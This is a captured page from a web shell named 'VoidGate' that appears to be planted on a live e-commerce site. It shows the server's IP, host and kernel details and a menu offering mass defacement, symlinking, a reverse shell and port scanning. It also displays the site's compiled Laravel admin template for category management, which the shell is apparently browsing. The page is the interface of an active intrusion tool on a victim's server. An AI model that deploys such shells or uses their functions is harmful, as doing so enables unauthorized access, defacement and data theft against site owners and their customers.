ヤミRoot VoidGate
User / IP
:
216.73.217.162
Host / Server
:
15.235.182.215 / pollibazaar.com
System
:
Linux asia.cbnex.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
pollibazaar
/
public_html
/
storage
/
framework
/
views
/
Viewing: b7bb26808feb886f4f9509d89d119871.php
<?php $__env->startSection('title', translate('Category')); ?> <?php $__env->startSection('content'); ?> <div class="content container-fluid"> <div class="mb-3"> <h2 class="h1 mb-0 d-flex gap-10"> <img src="<?php echo e(dynamicAsset(path: 'public/assets/new/back-end/img/brand-setup.png')); ?>" alt=""> <?php echo e(translate('Category_Setup')); ?> </h2> </div> <div class="row mt-20" id="cate-table"> <div class="col-md-12"> <div class="card"> <div class="card-body d-flex flex-column gap-20"> <div class="d-flex justify-content-between align-items-center gap-20 flex-wrap"> <h3 class="mb-0"> <?php echo e(translate('category_List')); ?> <span class="badge text-dark bg-body-secondary fw-semibold rounded-50"> <?php echo e($categories->total()); ?> </span> </h3> <div class="d-flex flex-wrap gap-3 align-items-center"> <form action="<?php echo e(url()->current()); ?>" method="GET" class="flex-grow-1"> <div class="input-group min-w-300"> <input id="" type="search" name="searchValue" class="form-control" placeholder="<?php echo e(translate('search_by_category')); ?>" value="<?php echo e(request('searchValue')); ?>"> <div class="input-group-append search-submit"> <button type="submit"> <i class="fi fi-rr-search"></i> </button> </div> </div> </form> <div class="dropdown"> <a type="button" class="btn btn-outline-primary" href="<?php echo e(route('admin.category.export', ['searchValue' => request('searchValue')])); ?>"> <i class="fi fi-sr-inbox-in"></i> <span class="fs-12"><?php echo e(translate('export')); ?></span> </a> </div> <div> <button class="btn btn-primary" title="<?php echo e(translate('Add')); ?>" data-bs-toggle="offcanvas" href="#categoryAddOffcanvas" > + <?php echo e(translate('Add_Category')); ?></button> </div> </div> </div> <div class="table-responsive"> <table class="table table-hover table-borderless align-middle"> <thead class="text-capitalize"> <tr> <th><?php echo e(translate('SL')); ?></th> <th class="text-center"><?php echo e(translate('category_Image')); ?></th> <th><?php echo e(translate('name')); ?></th> <?php if($categoryWiseTax): ?> <th><?php echo e(translate('tax_rate')); ?></th> <?php endif; ?> <th class="text-center"><?php echo e(translate('priority')); ?></th> <th class="text-center"><?php echo e(translate('home_category_status')); ?></th> <th class="text-center"><?php echo e(translate('action')); ?></th> </tr> </thead> <tbody> <?php $__currentLoopData = $categories; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $category): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <tr> <td><?php echo e($categories->firstItem() + $key); ?></td> <td class="d-flex justify-content-center"> <div class="avatar-60 d-flex align-items-center rounded-circle overflow-hidden"> <img class="w-100 h-100 object-fit-cover" alt="" src="<?php echo e(getStorageImages(path: $category->icon_full_url, type: 'backend-category')); ?>"> </div> </td> <td> <h6 class="fs-14 line-1 max-w-200"><?php echo e($category['defaultname']); ?></h6> <span class="fs-12"><?php echo e(translate('ID')); ?> #<?php echo e($category['id']); ?></span> </td> <?php if($categoryWiseTax): ?> <td> <?php $__empty_1 = true; $__currentLoopData = $category?->taxVats; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $item): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); $__empty_1 = false; ?> <div class="d-flex gap-1"> <?php echo e($item?->tax?->name); ?> : <span>(<?php echo e($item?->tax?->tax_rate ?? 0); ?>%)</span> </div> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); if ($__empty_1): ?> <span><?php echo e(translate('N/A')); ?></span> <?php endif; ?> </td> <?php endif; ?> <td class="text-center"> <?php echo e($category['priority']); ?> </td> <td class="text-center"> <form action="<?php echo e(route('admin.category.status')); ?>" method="post" id="category-status<?php echo e($category['id']); ?>-form" class="no-reload-form"> <?php echo csrf_field(); ?> <input type="hidden" name="id" value="<?php echo e($category['id']); ?>"> <label class="switcher mx-auto" for="category-status<?php echo e($category['id']); ?>"> <input class="switcher_input custom-modal-plugin" type="checkbox" value="1" name="home_status" id="category-status<?php echo e($category['id']); ?>" <?php echo e($category['home_status'] == 1 ? 'checked' : ''); ?> data-modal-type="input-change-form" data-modal-form="#category-status<?php echo e($category['id']); ?>-form" data-on-image="<?php echo e(dynamicAsset(path: 'public/assets/new/back-end/img/modal/category-status-on.png')); ?>" data-off-image="<?php echo e(dynamicAsset(path: 'public/assets/new/back-end/img/modal/category-status-off.png')); ?>" data-on-title="<?php echo e(translate('Want_to_Turn_ON').' '.$category['defaultname'].' '. translate('status')); ?>" data-off-title="<?php echo e(translate('Want_to_Turn_OFF').' '.$category['defaultname'].' '.translate('status')); ?>" data-on-message="<p><?php echo e(translate('if_enabled_this_category_it_will_be_visible_from_the_category_wise_product_section_in_the_website_and_customer_app_in_the_homepage')); ?></p>" data-off-message="<p><?php echo e(translate('if_disabled_this_category_it_will_be_hidden_from_the_category_wise_product_section_in_the_website_and_customer_app_in_the_homepage')); ?></p>" data-on-button-text="<?php echo e(translate('turn_on')); ?>" data-off-button-text="<?php echo e(translate('turn_off')); ?>"> <span class="switcher_control"></span> </label> </form> </td> <td> <div class="d-flex justify-content-center gap-3"> <a class="btn btn-outline-info icon-btn edit" title="<?php echo e(translate('Edit')); ?>" data-bs-toggle="offcanvas" href="#categoryEditOffcanvas-<?php echo e($category['id']); ?>"> <i class="fi fi-sr-pencil"></i> </a> <a class="btn btn-outline-danger icon-btn delete-category" title="<?php echo e(translate('delete')); ?>" data-product-count="<?php echo e(count($category?->product)); ?>" data-text="<?php echo e(translate('there_were_').count($category?->product).translate('_products_under_this_category').'.'.translate('please_update_their_category_from_the_below_list_before_deleting_this_one').'.'); ?>" id="<?php echo e($category['id']); ?>"> <i class="fi fi-rr-trash"></i> </a> </div> </td> </tr> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </tbody> </table> </div> <div class="table-responsive mt-4"> <div class="d-flex justify-content-lg-end"> <?php echo e($categories->links()); ?> </div> </div> <?php if(count($categories) == 0): ?> <?php echo $__env->make('layouts.admin.partials._empty-state',['text'=>'no_category_found'],['image'=>'default'], array_diff_key(get_defined_vars(), ['__data' => 1, '__path' => 1]))->render(); ?> <?php endif; ?> </div> </div> </div> </div> </div> <?php echo $__env->make("admin-views.category.offcanvas._category-add", ['categoryType' => 'category'], array_diff_key(get_defined_vars(), ['__data' => 1, '__path' => 1]))->render(); ?> <?php $__currentLoopData = $categoriesWithTrans; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $category): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <?php echo $__env->make("admin-views.category.offcanvas._category-edit", ['category' => $category], array_diff_key(get_defined_vars(), ['__data' => 1, '__path' => 1]))->render(); ?> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> <span id="route-admin-category-delete" data-url="<?php echo e(route('admin.category.delete')); ?>"></span> <span id="get-categories" data-categories="<?php echo e(json_encode($categories)); ?>"></span> <div class="modal fade" id="select-category-modal" tabindex="-1" aria-labelledby="toggle-modal" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered"> <div class="modal-content shadow-lg"> <div class="modal-header border-0 pb-0 d-flex justify-content-end"> <button type="button" class="btn-close border-0 btn-circle bg-section2 shadow-none" data-bs-dismiss="modal" aria-label="Close"><i class="tio-clear"></i></button> </div> <div class="modal-body px-4 px-sm-5 pt-0 pb-sm-5"> <div class="d-flex flex-column align-items-center text-center gap-2 mb-2"> <div class="toggle-modal-img-box d-flex flex-column justify-content-center align-items-center mb-3 position-relative"> <img src="<?php echo e(dynamicAsset('public/assets/new/back-end/img/icons/info.svg')); ?>" alt="" width="90"/> </div> <h5 class="modal-title mb-2 category-title-message category-title-message"></h5> </div> <form action="<?php echo e(route('admin.category.delete')); ?>" method="post" class="product-category-update-form-submit"> <?php echo csrf_field(); ?> <input name="id" hidden=""> <div class="d-flex flex-column gap-2 mb-3"> <label class="title-color" for="exampleFormControlSelect1"><?php echo e(translate('select_Category')); ?> <span class="text-danger">*</span> </label> <select name="category_id" class="form-control js-select2-custom category-option" required> </select> </div> <div class="d-flex justify-content-center gap-3"> <button type="submit" class="btn btn-primary min-w-120"><?php echo e(translate('update')); ?></button> <button type="button" class="btn btn-danger min-w-120" data-bs-dismiss="modal"> <?php echo e(translate('cancel')); ?> </button> </div> </form> </div> </div> </div> </div> <?php $__env->stopSection(); ?> <?php $__env->startPush('script'); ?> <script src="<?php echo e(dynamicAsset(path: 'public/assets/backend/admin/js/products/products-management.js')); ?>"></script> <?php $__env->stopPush(); ?> <?php echo $__env->make('layouts.admin.app', array_diff_key(get_defined_vars(), ['__data' => 1, '__path' => 1]))->render(); ?><?php /**PATH /home/pollibazaar/public_html/resources/views/admin-views/category/view.blade.php ENDPATH**/ ?>
Coded With 💗 by
0x6ick